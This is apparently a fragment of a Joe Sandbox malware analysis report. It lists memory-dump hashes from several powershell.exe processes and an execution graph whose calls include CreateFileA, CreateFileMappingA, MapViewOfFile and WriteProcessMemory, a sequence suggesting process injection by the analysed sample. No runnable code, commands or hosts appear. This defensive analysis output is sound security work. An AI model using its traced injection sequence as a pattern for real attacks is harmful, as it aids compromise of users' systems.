                                                        • Opcode ID: d094dce60be8fae7ea93f14c45549e778f5374dc9977abe8c1b9d7c73d06e931
                                                        • Instruction ID: c7b8a55ee469fec37b56297cbb955230dce699f6a6247ad8c18fda0b6fa49d18
                                                        • Opcode Fuzzy Hash: d094dce60be8fae7ea93f14c45549e778f5374dc9977abe8c1b9d7c73d06e931
                                                        • Instruction Fuzzy Hash: D961FD38A002498FDB14DFA4C544AADBBB6EF88304F258558E506EF365DB74ED89CF80
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65e4b551e42a713b2e2998908c3745caddac7c3e9fdbd0336123881844d26e67
                                                        • Instruction ID: 0ef7dd9c4e0e838cbb2daac750db133d9647c133df9b96263f14cfffd83e5a1c
                                                        • Opcode Fuzzy Hash: 65e4b551e42a713b2e2998908c3745caddac7c3e9fdbd0336123881844d26e67
                                                        • Instruction Fuzzy Hash: 62516C79E002189FEB18DFA9D8447AEBBF6BF88314F148469D409EB390DB74A841CF41
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0a3523d27a042a499384ac7fa3398a054e38abfc73febc6a18d2d9bbc18a484
                                                        • Instruction ID: 73c23723710c7239021fbfba6b7a2eb7f045c4d4fb3fb7cd7e8c99177d066716
                                                        • Opcode Fuzzy Hash: c0a3523d27a042a499384ac7fa3398a054e38abfc73febc6a18d2d9bbc18a484
                                                        • Instruction Fuzzy Hash: C5415E78A002098FCB19CF58C594AAEFBB1FF48310B258199D815EB765C736EC91CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4abf6b7912b2f369a83063e3cb47badae95ba588528d4f0e5c2819ee567a02f
                                                        • Instruction ID: 21c07818e3824a20c08d42420ec33de83c7be5db0267b6a440f8ca73352f42a2
                                                        • Opcode Fuzzy Hash: e4abf6b7912b2f369a83063e3cb47badae95ba588528d4f0e5c2819ee567a02f
                                                        • Instruction Fuzzy Hash: B7412A78E002189FEB18DFA9C4447AEFBF6BF84314F248469D415AB794DB74A941CF81
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b2a21cd8fce16f871a67fe0fc241ac4a6914d1163abb1a5b668fda144582f93
                                                        • Instruction ID: def7c9effeeb27d7575a78a573941b5a1a1d31848c7847f16c3fa40698dff10d
                                                        • Opcode Fuzzy Hash: 3b2a21cd8fce16f871a67fe0fc241ac4a6914d1163abb1a5b668fda144582f93
                                                        • Instruction Fuzzy Hash: 9631F439E4034A9FDB15DFB4C4106AEBBB2EF85300F20452ED505EB281EBB0E985CB91
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1aadff13863721390ff7f29b6f25921f6c1ce118c8826e4432fc7ce62fd33df
                                                        • Instruction ID: 613f1460e94a1b1a752f0e4225c59daba870cb85497696e66f311e64509ab413
                                                        • Opcode Fuzzy Hash: e1aadff13863721390ff7f29b6f25921f6c1ce118c8826e4432fc7ce62fd33df
                                                        • Instruction Fuzzy Hash: 92417E78A00609CFCB19CF48C494EAAF7B1FF48320B218299D815AB765C336FC91CB94
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f8e6caf2e44469642eefdd851a4b4731b8a7e9901cba531c14fee2dd71a7ae5
                                                        • Instruction ID: 9a88bc20b62f1e26e4d3d43230ace0536239fc6f4190acd231e59f63a35b60c5
                                                        • Opcode Fuzzy Hash: 2f8e6caf2e44469642eefdd851a4b4731b8a7e9901cba531c14fee2dd71a7ae5
                                                        • Instruction Fuzzy Hash: 6541AF78A00605CFCB1ACF58C094AA9F7B1FF48314F258299D919EB6A5C736FC91CB94
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 784695d4724ef354cd240f32537d9777be88a60a53be14435f64449a3590c9e7
                                                        • Instruction ID: 976312b188c7675dff51f506911d49440d8f72bce4ae7e7c51176382281eab9b
                                                        • Opcode Fuzzy Hash: 784695d4724ef354cd240f32537d9777be88a60a53be14435f64449a3590c9e7
                                                        • Instruction Fuzzy Hash: 55317A39B005048FDB149F29D848AAEBBF6EF8C711F244069E50AEB3A0DB709C51CF50
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3705443156.000000000281D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0281D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_281d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e2c43c47b4c5ef1d68800a8196c95deef3cac5971d9c40ff2cd6ddb93c6edd7
                                                        • Instruction ID: 8272cd059e9504e373acf3ccd429fae38539056b6ab4ff140dc6d93d8c899b4f
                                                        • Opcode Fuzzy Hash: 6e2c43c47b4c5ef1d68800a8196c95deef3cac5971d9c40ff2cd6ddb93c6edd7
                                                        • Instruction Fuzzy Hash: E901A739404344AFE7208A25D984B66BBDCDF41664F18C55AED488F2C2C3799445CAB6
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3705443156.000000000281D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0281D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_281d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09111eff5eac9b21ed6dc01160e34a5a7eefee029bedd5bd77ca753346b0651e
                                                        • Instruction ID: d16a2ca614ecf3530892139543787c56475238506a73f7160410b8795505d6b4
                                                        • Opcode Fuzzy Hash: 09111eff5eac9b21ed6dc01160e34a5a7eefee029bedd5bd77ca753346b0651e
                                                        • Instruction Fuzzy Hash: B801406540E3C09FD7124B258894B52BFB8DF43224F1981CBD9888F1A3C2695845C772
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6410c3f4b75491c2b9c8c70b74e8a7070b8c7648c5b5d23e20115c06b9155273
                                                        • Instruction ID: d3d0d4311062bedce36a4a657677809df0ec1e4e7777bfcd27056de2ee2c5444
                                                        • Opcode Fuzzy Hash: 6410c3f4b75491c2b9c8c70b74e8a7070b8c7648c5b5d23e20115c06b9155273
                                                        • Instruction Fuzzy Hash: 19E02B35B043511BD321D378E4407D97B92DFC2310B0481E9E500CF645DE78AD428793
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c40e460ca19b7ba7c86f9051477fef8fa6cb7757db6d09fa3d32000b9c95378b
                                                        • Instruction ID: 2fecdfbb074baf039a52324a588ecb3cc2caec6f9efbfe557d5d2091c015fb4a
                                                        • Opcode Fuzzy Hash: c40e460ca19b7ba7c86f9051477fef8fa6cb7757db6d09fa3d32000b9c95378b
                                                        • Instruction Fuzzy Hash: 46D05E3A701214178B1422BE799C86BBADEA6CC6753148476A50DD3300EDB99C4249A0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9732bda195cf64a39c4506fc31fd199dae484591223e2c11c9fecc924423df1
                                                        • Instruction ID: 125c1a2ad4be4d58a737f919212660bc2f8c0ad6bff83a1946b2b18a3ded6086
                                                        • Opcode Fuzzy Hash: c9732bda195cf64a39c4506fc31fd199dae484591223e2c11c9fecc924423df1
                                                        • Instruction Fuzzy Hash: CFE086396441159FC7009F64F5459D97BA9DB4D390B018061E909AB362CB79AC064BD1
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 644ae6ae73e951cf43992b9b208b647ad9b2d7e1fa3d8abc19dce8c7a225a192
                                                        • Instruction ID: 2dbcea22b231d55211a4b0479b898b52e37d78ead984c2d182b091cfd23fa476
                                                        • Opcode Fuzzy Hash: 644ae6ae73e951cf43992b9b208b647ad9b2d7e1fa3d8abc19dce8c7a225a192
                                                        • Instruction Fuzzy Hash: BAD05E392001149FC704AB68E449C95BBE9EB4C354705C0A2E909D7362CB35EC008B91
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1323695940.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_4e10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 36a6e55a19ed6b49085f1545c9fe164fd3694016b2da477f1166cf3df7fac0b1
                                                        • Instruction ID: 84434fd6b6f23bf71cbe8fe5bac12c5be00bb145bb7aabdf906c073c5831a76f
                                                        • Opcode Fuzzy Hash: 36a6e55a19ed6b49085f1545c9fe164fd3694016b2da477f1166cf3df7fac0b1
                                                        • Instruction Fuzzy Hash: 2A919D74A002058FCB15CF58C894EAEFBB1FF88310B248699DA55AB365C735FC91CBA0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1323695940.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_4e10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 255bd9e71c5926d39883fb894bc1a58a9c940f71b7130db8ae67fe6199707e87
                                                        • Instruction ID: 8b16cb27eac5fb40b18f0e3538ad16759577ae9695fd5cc780cba8bdcb1d55a6
                                                        • Opcode Fuzzy Hash: 255bd9e71c5926d39883fb894bc1a58a9c940f71b7130db8ae67fe6199707e87
                                                        • Instruction Fuzzy Hash: 5E519174A002099FCB15CF58C894EAEF7B1FF48324B114699DA55AB3A4C736FC51CB90
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1322539728.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_33bd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c26024012f680046b9c55e54362691b0fe4cedbe0557808ac0e354acdc6cf10b
                                                        • Instruction ID: 641e4e0bd7da90d12d54e10728e3681667156f2e1a318134fdf559632e28783a
                                                        • Opcode Fuzzy Hash: c26024012f680046b9c55e54362691b0fe4cedbe0557808ac0e354acdc6cf10b
                                                        • Instruction Fuzzy Hash: B5016D724093809FD7128B258C94792BFB8DF43220F1984CBE9888F593C2799844CB72
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1322539728.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_33bd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c81d1d15ba203f6436302dfd7cde742f28dbdfcc71df9a9bbbb3a6cb55149854
                                                        • Instruction ID: 9a39e595d5b20c7812b78512a8f8321fcef5e8999ceba99aebbbc3701d693047
                                                        • Opcode Fuzzy Hash: c81d1d15ba203f6436302dfd7cde742f28dbdfcc71df9a9bbbb3a6cb55149854
                                                        • Instruction Fuzzy Hash: 1D01A231405340AAE7208E25CDC4BA7FBACEF41664F18855AEE494FA82C27D9945CAB2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.1312492247.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_41b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: 56521ff4ef561b1cdebde6612dea1f4c689636f99b85bc540857e9f1420e6a96
                                                        • Instruction ID: 1fa88e9a4787f35942422bef1cc62ce20559c77108befdad1dd718a1abadc677
                                                        • Opcode Fuzzy Hash: 56521ff4ef561b1cdebde6612dea1f4c689636f99b85bc540857e9f1420e6a96
                                                        • Instruction Fuzzy Hash: 57522A34B00318CFDB25DB64C994BADB7B3AF85300F1581A9D9499B394DB35AD81CF92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.1312492247.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_41b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: 3ccaabbeb36d5767a935c2debec1ad6d0bfafb964176bf40fa6f907513768998
                                                        • Instruction ID: 8e1bd78c45e2cb8a2ef234650be9be4887c81bd1c267b0f20218c807f6c2f649
                                                        • Opcode Fuzzy Hash: 3ccaabbeb36d5767a935c2debec1ad6d0bfafb964176bf40fa6f907513768998
                                                        • Instruction Fuzzy Hash: C7518F30B043549FDB25CF68D854BADBBB2BF89700F1140A9E5459B391DB71AD41CF92
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.1312492247.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_41b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3e4ded6893a5b1768c1a95d48d3f6f1cee71aabd638aec401f7e6398bcb418d
                                                        • Instruction ID: 5e119b66b093fab93bbab7797bb6a75faf8bb783e777f9bb29ff0742d4c317ec
                                                        • Opcode Fuzzy Hash: b3e4ded6893a5b1768c1a95d48d3f6f1cee71aabd638aec401f7e6398bcb418d
                                                        • Instruction Fuzzy Hash: A8916B74A002098FCB15CF58C5D8AEAFBB1FF48310B248599D855AB7A5C736FC91CBA4
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.1312492247.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_41b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 098226853f9e1cfdcfd18e9fb9edcfdbcd5edc44611ef7a0018f0958aa5cfe59
                                                        • Instruction ID: e1f82565222aea72cf5e087ec347ab277eec3865542035a662ac2a0e7ba672ee
                                                        • Opcode Fuzzy Hash: 098226853f9e1cfdcfd18e9fb9edcfdbcd5edc44611ef7a0018f0958aa5cfe59
                                                        • Instruction Fuzzy Hash: 8E412574A002098FCB06CF58C5E8AEAF7B1FF48310B218599D855AB764C736FC91CBA4
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.1312492247.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_41b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3efdfe5ec70a6fc0c2375d84390275b2a6f1de0f5817b6b1346e9ec96f4ad56
                                                        • Instruction ID: 671ba059717fb5ce00fd75535d40c46f034daf14f228cd559a1b63dc22092943
                                                        • Opcode Fuzzy Hash: d3efdfe5ec70a6fc0c2375d84390275b2a6f1de0f5817b6b1346e9ec96f4ad56
                                                        • Instruction Fuzzy Hash: 37015275F0020C9FCB14DBA895513FEBFF69B88200F00846BD519A7780EB3555518FD2
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.1310190651.00000000027FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_27fd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 84a9f594046719d45e16525d910919c1c677ae53757b7bbb8cd8255a226d4cdf
                                                        • Instruction ID: b3cfc2b2bf8d4f97b0387a9891de82185621254adf765e00a6a167a4909b800b
                                                        • Opcode Fuzzy Hash: 84a9f594046719d45e16525d910919c1c677ae53757b7bbb8cd8255a226d4cdf
                                                        • Instruction Fuzzy Hash: 9401A23150C340EAE7705B25C984B67BB98EF41664F18856AEE481F782C3799845CAB2
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.1310190651.00000000027FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_27fd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f7de4d2bbb6d3d3871b1670b147c06e911a84aedda4ffc7536aa1a210dc24254
                                                        • Instruction ID: 171b6bc8da78fc1c39f6bb34cdc78d61a30e22de606552812e82d3e828c64736
                                                        • Opcode Fuzzy Hash: f7de4d2bbb6d3d3871b1670b147c06e911a84aedda4ffc7536aa1a210dc24254
                                                        • Instruction Fuzzy Hash: 3701257240E3C09FD7264B258D94B66BFB4DF43224F1D81DBE9888F6A3C2695849C772
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.1312492247.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_41b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: faa6dc21793f7b7b9cfd54194dabe440a0fc5cdf0c7423e535bf577d0eba7161
                                                        • Instruction ID: 9eb525ccc53afa6a8fa3a53b792fc0204d3a9ed670d381b8abe55d713a0fd600
                                                        • Opcode Fuzzy Hash: faa6dc21793f7b7b9cfd54194dabe440a0fc5cdf0c7423e535bf577d0eba7161
                                                        • Instruction Fuzzy Hash: B8E026B4E0424E9F8F48DFB995411BEFBF5AB48201F1089AFD829E3340E67456118FD5
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.1312492247.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_41b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 73185c6b05fe3957811f69c35103bb275f4fd589c24fdaea3e2ddff504e21d19
                                                        • Instruction ID: 8236db9e5dda4d1a024b77e99c6a6c2e81e6cf954784b9d38b53c64947ef5bc7
                                                        • Opcode Fuzzy Hash: 73185c6b05fe3957811f69c35103bb275f4fd589c24fdaea3e2ddff504e21d19
                                                        • Instruction Fuzzy Hash: 6ED05E3100E395DFD30283B0960A6B07FB9EB43204B4800E6E488864A3E3186499C3E2

                                                        Execution Graph

                                                        Execution Coverage:2.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:19.2%
                                                        Total number of Nodes:73
                                                        Total number of Limit Nodes:6
                                                        execution_graph 73316 8078cd0 73317 8078ce5 73316->73317 73321 8078e3f 73317->73321 73329 8078dbc 73317->73329 73318 8078cfb 73322 8078d6a 73321->73322 73323 8078d79 73322->73323 73324 8078f07 73322->73324 73337 80791f0 73322->73337 73344 8079200 73322->73344 73323->73318 73324->73323 73327 80791f0 6 API calls 73324->73327 73328 8079200 6 API calls 73324->73328 73327->73324 73328->73324 73331 8078d6a 73329->73331 73330 8078d79 73330->73318 73331->73329 73331->73330 73332 8078f07 73331->73332 73333 80791f0 6 API calls 73331->73333 73334 8079200 6 API calls 73331->73334 73332->73330 73335 80791f0 6 API calls 73332->73335 73336 8079200 6 API calls 73332->73336 73333->73331 73334->73331 73335->73332 73336->73332 73338 8079200 73337->73338 73339 807922e 73338->73339 73351 8079902 73338->73351 73356 807a062 73338->73356 73361 807a9f9 73338->73361 73366 8079e03 73338->73366 73339->73322 73345 8079215 73344->73345 73346 807922e 73345->73346 73347 8079e03 2 API calls 73345->73347 73348 8079902 2 API calls 73345->73348 73349 807a062 2 API calls 73345->73349 73350 807a9f9 2 API calls 73345->73350 73346->73322 73347->73346 73348->73346 73349->73346 73350->73346 73352 807990c 73351->73352 73371 807f000 73352->73371 73375 807eff4 73352->73375 73357 807a9fb 73356->73357 73379 807ec38 73357->73379 73383 807ec2c 73357->73383 73362 807a9ff 73361->73362 73364 807ec2c CreateFileA 73362->73364 73365 807ec38 CreateFileA 73362->73365 73363 807aa3f 73364->73363 73365->73363 73367 8079e12 73366->73367 73387 807f340 73367->73387 73391 807f338 73367->73391 73368 807974e 73372 807f055 CreateFileMappingA 73371->73372 73374 807f0f9 73372->73374 73376 807f055 CreateFileMappingA 73375->73376 73378 807f0f9 73376->73378 73380 807ec8a CreateFileA 73379->73380 73382 807ed33 73380->73382 73384 807ec38 CreateFileA 73383->73384 73386 807ed33 73384->73386 73388 807f380 MapViewOfFile 73387->73388 73390 807f3bd 73388->73390 73390->73368 73392 807f340 MapViewOfFile 73391->73392 73394 807f3bd 73392->73394 73394->73368 73296 6ba65b0 73297 6ba65c8 73296->73297 73298 6ba66d3 73297->73298 73302 6bf38bc 73297->73302 73307 6bf3ab7 73297->73307 73312 6bf3c20 73297->73312 73305 6bf38d4 73302->73305 73303 6bf3c81 WriteProcessMemory 73304 6bf3cbc 73303->73304 73304->73298 73305->73303 73306 6bf39ab 73305->73306 73306->73298 73309 6bf3a15 73307->73309 73311 6bf3ad0 73307->73311 73308 6bf3c81 WriteProcessMemory 73310 6bf3cbc 73308->73310 73309->73307 73309->73308 73310->73298 73313 6bf3c6b WriteProcessMemory 73312->73313 73315 6bf3cbc 73313->73315 73315->73298
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2172710117.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2c90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @pp^$Qpp^
                                                        • API String ID: 0-4274697155
                                                        • Opcode ID: 704edbc0b1c738a7c94b6071abffdf1f83059601f13c1c22713446f083b3f48b
                                                        • Instruction ID: 27a63886509be024a974a62a807346ece1c7a1c5e38d3e2bef7876d6ad683024
                                                        • Opcode Fuzzy Hash: 704edbc0b1c738a7c94b6071abffdf1f83059601f13c1c22713446f083b3f48b
                                                        • Instruction Fuzzy Hash: 6033E070A05384AFDB02CF68D498ADDBFB1FF4A318F19819AE4449B262C735DD46CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: 0a2f012aa07a98eab5859edc1fedd7a68c159835385bb71f44fcc4d60f64a9b7
                                                        • Instruction ID: ed1431d7b31b28b2eb68afce6d7e5efd701cfee72bbec7ce0f6a14853a6219c1
                                                        • Opcode Fuzzy Hash: 0a2f012aa07a98eab5859edc1fedd7a68c159835385bb71f44fcc4d60f64a9b7
                                                        • Instruction Fuzzy Hash: 1CB10674A0120DCFDB14CFA8D485BEEBBF1FB49715F2080AAE409AB690DB745A45CF90
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 54bc2e6eb19a14cc64ed1080e513872b8da7bdd3548857ce198a767cb6b03bb7
                                                        • Instruction ID: 745edf4696fc4739f15e2566f9124dd69581f0350ac2a77b713ec75f97667934
                                                        • Opcode Fuzzy Hash: 54bc2e6eb19a14cc64ed1080e513872b8da7bdd3548857ce198a767cb6b03bb7
                                                        • Instruction Fuzzy Hash: 9552B3B4A106298FCB64DF28CD84B9ABBB6FB89301F5085D9D50DA7351DB30AE85CF50
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2172710117.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2c90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 497c2a8623b2f4a5337eeae0cd063096dde7223837d32adae80d22e2428894b6
                                                        • Instruction ID: 7e5b6917e05e85782519065c9ccab5dacb6c3e6f96a58dcc33d22e51aab7ee5a
                                                        • Opcode Fuzzy Hash: 497c2a8623b2f4a5337eeae0cd063096dde7223837d32adae80d22e2428894b6
                                                        • Instruction Fuzzy Hash: D5E1E1B290EBD14FD707AB3898A55C67F71EF53228B0A00CBC095DF0A3D618584BC7A6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 958126f7aff73d8723720594fc8039fc0441f230fb1101dbe6d3c54e44c7820a
                                                        • Instruction ID: 224ff0af941f87d8a7cdef1d4d776c21ca482741776e8c6b383c629c63c84492
                                                        • Opcode Fuzzy Hash: 958126f7aff73d8723720594fc8039fc0441f230fb1101dbe6d3c54e44c7820a
                                                        • Instruction Fuzzy Hash: B481F374E15218CFDB54CFA9D888BADBBF2BB4A301F1090A9D409A7750DB749C85CF48
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 036d2abb79041d75042989a39521cd1f6cf0dec1287deb8d0182901898bc7a0e
